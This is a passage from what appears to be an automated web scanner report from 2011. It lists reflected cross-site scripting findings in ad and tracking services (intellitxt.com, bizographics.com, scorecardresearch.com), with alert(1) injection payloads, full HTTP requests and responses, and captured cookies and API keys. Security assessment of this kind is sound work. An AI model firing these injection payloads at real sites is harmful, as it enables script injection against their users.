<html><body><script src="http://pixel.intellitxt.com/pixel.jsp?id=2639,2621,2615,2653,2638&type=script&ipid=28338&sfid=0a71ee"><script>alert(1)</script>7cf764381b3" language="javascript"></script></bo
...[SNIP]...

2.60. http://americanbankingnews.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://americanbankingnews.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed785'-alert(1)-'0dd68f3ce7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /intellitxt/front.asp?ipid=28338&ed785'-alert(1)-'0dd68f3ce7c=1 HTTP/1.1
Host: americanbankingnews.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR="AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1X/pTgA-"

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwQAAAEv1YytxgA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:17:37 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:17:37 GMT
Age: 0
Connection: keep-alive
Content-Length: 10798

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...
TXT.js.qaol=false;
$iTXT.js.gaEnabled=false;$iTXT.js.serverUrl='http://americanbankingnews.us.intellitxt.com';$iTXT.js.serverName='americanbankingnews.us.intellitxt.com';$iTXT.js.pageQuery='ipid=28338&ed785'-alert(1)-'0dd68f3ce7c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=20000&c4=&c5=&c6=&c15=&cv=1.3
...[SNIP]...

2.61. http://americanbankingnews.us.intellitxt.com/v4/init [jscallback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://americanbankingnews.us.intellitxt.com
Path:	/v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d2299%3balert(1)//155d9e83042 was submitted in the jscallback parameter. This input was echoed as d2299;alert(1)//155d9e83042 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /v4/init?ts=1304957884152&pagecl=9812&fv=10&muid=&refurl=http%3A%2F%2Fwww.americanbankingnews.com%2F2011%2F05%2F09%2Fmorgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight%2F&ipid=28338&jscallback=$iTXT.js.callback0d2299%3balert(1)//155d9e83042 HTTP/1.1
Host: americanbankingnews.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwUAAAEv1Y0E5wA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:20:58 GMT
Age: 0
Connection: keep-alive
Content-Length: 20430

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback0d2299;alert(1)//155d9e83042({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

2.62. http://americanbankingnews.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://americanbankingnews.us.intellitxt.com
Path:	/v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bada4"-alert(1)-"ecd9ff21fc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /v4/init?ts=1304957884152&pagecl=9812&fv=10&muid=&refurl=http%3A%2F%2Fwww.americanbankingnews.com%2F2011%2F05%2F09%2Fmorgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight%2F&ipid=28338&jscallback=$iTXT.js.callback0&bada4"-alert(1)-"ecd9ff21fc5=1 HTTP/1.1
Host: americanbankingnews.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwUAAAEv1Y0E5wA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:21:03 GMT
Age: 0
Connection: keep-alive
Content-Length: 20411

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
rams){$iTXT.glob.dbgParams=new $iTXT.data.Param($iTXT.glob.dbParams,undefined,undefined,'DEBUG');}$iTXT.glob.dbgParams.set({"pagecl":"9812","fv":"10","ts":"1304957884152","dma":623,"POSTCODE":"75207","bada4"-alert(1)-"ecd9ff21fc5":"1","user-agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24","REGIONNAME":"Texas","muid":"","city":"Dallas","ipid":28338,"jscallback"
...[SNIP]...

2.63. http://api.bizographics.com/v1/profile.json [&callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload c05f4<script>alert(1)</script>d299f46ffb5 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=bio.loadBizoDatac05f4<script>alert(1)</script>d299f46ffb5&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/investing/future/clm11?link=MW_widget_latestnews_247wallst.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=Y2AeSAq4IDJC6aQZGMDMztQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGMyR2qTPkIbXGLVAipUzbMStcii8xtm6s0H3yzdFwsHy5c5kuSrbuhDoNcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL33N1TApcuWVlExkNK7HUtFQY8D8EoTSfZvfqipv6jnI0gYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSDQ1Q6sGK4trdsnRGwuisv9sgNCHPPoPZ5VIT8ipDjMS8dyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFaPEnipsJhgJV3obT1h54262MODCrIgmWLK2d1F6lwbTIy3g6K9xuVvyMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDohBR77bsTmbdsnRGwuisv9q7eAFpaIfjpipITxQisnpkaSG36lSisWrtgHisEfvIvmbyK5XisXfMnbTMcsk3xnkpa5OSJvQFEV9f3Dxo4N71w46SKb0NrpeKvDEEAHRkUP4DRqV5iiQvIb66JyjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMN4isdjziiaqnDohBR77bsTmY4SE3xQyPhdq7eAFpaIfjpLipuNAxnA4yJhmP6nyZfLL9RsQEA9ipXNdUJVXoFLQWgPDjIkuBQ5oxrpJTrsissWZKpXQONeWPGPce2MNOb54mfXnS9ty8xAR0zwQvdHhisgnlRisFzfnFAN3ep8Wip2NIxxmiif3K3nnDdM4jBDRPIWisbMcS3Fw0v8X0HAPgOrR4MFPl1lw7EBcDis19ZJQ3JfHnnDRoSxyEFf9iiFiitmAz1edRHVy3LkWZ838L4SqxJLtkDJDG63WARr9y0IvMxx19o1g1AgebObX3MuNLzYFJzoU1Xgieie; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 09 May 2011 16:22:35 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGMyR2qTPkIbXGLVAipUzbMStcii8xtm6s0H3yzdFwsHy5c5kuSrbuhDoNcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL33N1TApcuWVlExkNK7HUtFQY8D8EoTSfZvfqipv6jnI0gYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSDQ1Q6sGK4trdsnRGwuisv9sgNCHPPoPZ5VIT8ipDjMS8dyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFaPEnipsJhgJV3obT1h54262MODCrIgmWLK2d1F6lwbTIy3g6K9xuVvyMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDkmsTSfshiiWHdsnRGwuisv9oFE6Jdz0RndcWm6YNvF29p4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57QisqELPynI3I9NXzJIXKwEOngHh2VamB2AZ7cTKkIis5zvcAWXzmjMHFsOLGygkzZ3nLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhksJdJjg51dWJkNyCeo9TOO6Qw5is2jULnvCRp96z8l7NnOZRETmVn5isovJhA6Wtqr3yDbtg8TisKMCecaEIV2Tae4VSaFQdUxlAPK1cq2THu;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 403
Connection: keep-alive

bio.loadBizoDatac05f4<script>alert(1)</script>d299f46ffb5({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"information_technology","name":"Infor
...[SNIP]...

2.64. http://api.bizographics.com/v1/profile.json [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 8bc20<script>alert(1)</script>f1ccc2faccd was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?callback=load_ad_callback&api_key=18d8c7d8c4d04d1588a9cf479a85164e8bc20<script>alert(1)</script>f1ccc2faccd HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=LD8Lqa0kru8p5Uo0kpngf9Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGMyR2qTPkIbXGLVAipUzbMStcii8xtm6s0H3yzdFwsHy5c5kuSrbuhDoNcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL33N1TApcuWVlExkNK7HUtFQY8D8EoTSfZvfqipv6jnI0gYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSDQ1Q6sGK4trdsnRGwuisv9sgNCHPPoPZ5VIT8ipDjMS8dyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFaPEnipsJhgJV3obT1h54262MODCrIgmWLK2d1F6lwbTIy3g6K9xuVvyMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDAyrlxwspx6jdsnRGwuisv9h94yMkcwripPLER8XUiszfVdcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtFNsVrcrw312KlSryiiippLvHRWwTxBUSFRuufykhwWSlghzjIvVLoBhj5NDTHr2wr1kiiqD792pBiiZisWoLipipOUKipQLI4nnnPNiihWA5B16a2n9ccq0ipUPxAAhip91xU4n86mcz6mEmAc8TY0sRHxdTisN9V1yLzG2bqzQfB1c7D7UHWcJ7wkafesisJezZzmURE5lZipFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTBCmcQve7W9mKliiSobRLLWb5OrVGMiprsJQvfINu2DxP8owJ5xoQhXZNp7hVJoVB1TGlJZ8zWJiiJArqYAAFGAQj0dI1pxbY6k4tmEPishbY3ELmLzCbjtVl37F6KeOOIHvpt; BizoNetworkPartnerIndex=15

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 09 May 2011 16:18:25 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (18d8c7d8c4d04d1588a9cf479a85164e8bc20<script>alert(1)</script>f1ccc2faccd)

2.65. http://api.bizographics.com/v1/profile.redirect [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload e6ab3<script>alert(1)</script>5ca669a4cc3 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=595bae8dbc0c4c42b4544e688b10c002e6ab3<script>alert(1)</script>5ca669a4cc3&callback_url=http%3A%2F%2Flogger.krxd.net%2Fdata.gif%3F_kdpid%3D890a6228-04af-4630-85b6-0b49dee6157f HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=Y2AeSAq4IDJLyFSkSuipMiptQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGMyR2qTPkIbXGLVAipUzbMStcii8xtm6s0H3yzdFwsHy5c5kuSrbuhDoNcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL33N1TApcuWVlExkNK7HUtFQY8D8EoTSfZvfqipv6jnI0gYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSDQ1Q6sGK4trdsnRGwuisv9sgNCHPPoPZ5VIT8ipDjMS8dyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFaPEnipsJhgJV3obT1h54262MODCrIgmWLK2d1F6lwbTIy3g6K9xuVvyMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDSbP0dDEungTdsnRGwuisv9q7eAFpaIfjpcXQRU7wNUQ3YPdeKubByYjY6HUIHJts1rGPTVwNvtqn7IpubzjzW9UCfii3eHpFNXipzK0Ma07QdWsDeDbbSPfjMnZBEevEdVdToo08xl4m6FWqznJ5k9PXP3AkPTdukfJissSdo1Daipe3mQrTml9sDjvTV8ySFysBDp4B4dlWpgdgRX5u6SVExUb3AFl85ozBxwtEXfdcqmZdyw5x4tgvvEAkNgnwZ3isScHb9omWfr8ZII3cTDenm0gyuQdvaInsd5Z94YmH6QjdfWBhaC32TiiRHunbcqHPmoQv0TBH6isx1aZCU10f0IKisLgHsHbcJEipO6GSwl0mODnV1YmQ3IJ6j1M47pDDnisaNQue8JGn3rPyXs2c5lEROZWfnipii8mEDpa2qvfINu2DxP8owJ5xoQhXZNp7hVJoVB1TGUA8rVyrZMe4ie; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 09 May 2011 16:18:47 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (595bae8dbc0c4c42b4544e688b10c002e6ab3<script>alert(1)</script>5ca669a4cc3)

2.66. http://api.bizographics.com/v1/profile.redirect [callback_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 9c0cc<script>alert(1)</script>9ee7c2be9d7 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=595bae8dbc0c4c42b4544e688b10c002&callback_url=9c0cc<script>alert(1)</script>9ee7c2be9d7 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=Y2AeSAq4IDJLyFSkSuipMiptQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGMyR2qTPkIbXGLVAipUzbMStcii8xtm6s0H3yzdFwsHy5c5kuSrbuhDoNcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL33N1TApcuWVlExkNK7HUtFQY8D8EoTSfZvfqipv6jnI0gYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSDQ1Q6sGK4trdsnRGwuisv9sgNCHPPoPZ5VIT8ipDjMS8dyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFaPEnipsJhgJV3obT1h54262MODCrIgmWLK2d1F6lwbTIy3g6K9xuVvyMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDSbP0dDEungTdsnRGwuisv9q7eAFpaIfjpcXQRU7wNUQ3YPdeKubByYjY6HUIHJts1rGPTVwNvtqn7IpubzjzW9UCfii3eHpFNXipzK0Ma07QdWsDeDbbSPfjMnZBEevEdVdToo08xl4m6FWqznJ5k9PXP3AkPTdukfJissSdo1Daipe3mQrTml9sDjvTV8ySFysBDp4B4dlWpgdgRX5u6SVExUb3AFl85ozBxwtEXfdcqmZdyw5x4tgvvEAkNgnwZ3isScHb9omWfr8ZII3cTDenm0gyuQdvaInsd5Z94YmH6QjdfWBhaC32TiiRHunbcqHPmoQv0TBH6isx1aZCU10f0IKisLgHsHbcJEipO6GSwl0mODnV1YmQ3IJ6j1M47pDDnisaNQue8JGn3rPyXs2c5lEROZWfnipii8mEDpa2qvfINu2DxP8owJ5xoQhXZNp7hVJoVB1TGUA8rVyrZMe4ie; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 09 May 2011 16:18:49 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 9c0cc<script>alert(1)</script>9ee7c2be9d7

2.67. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload ced28<script>alert(1)</script>e7b022f98a9 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2ced28<script>alert(1)</script>e7b022f98a9&c2=7290380&c3=&c4=http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:18:21 GMT
Date: Mon, 09 May 2011 16:18:21 GMT
Connection: close
Content-Length: 1348

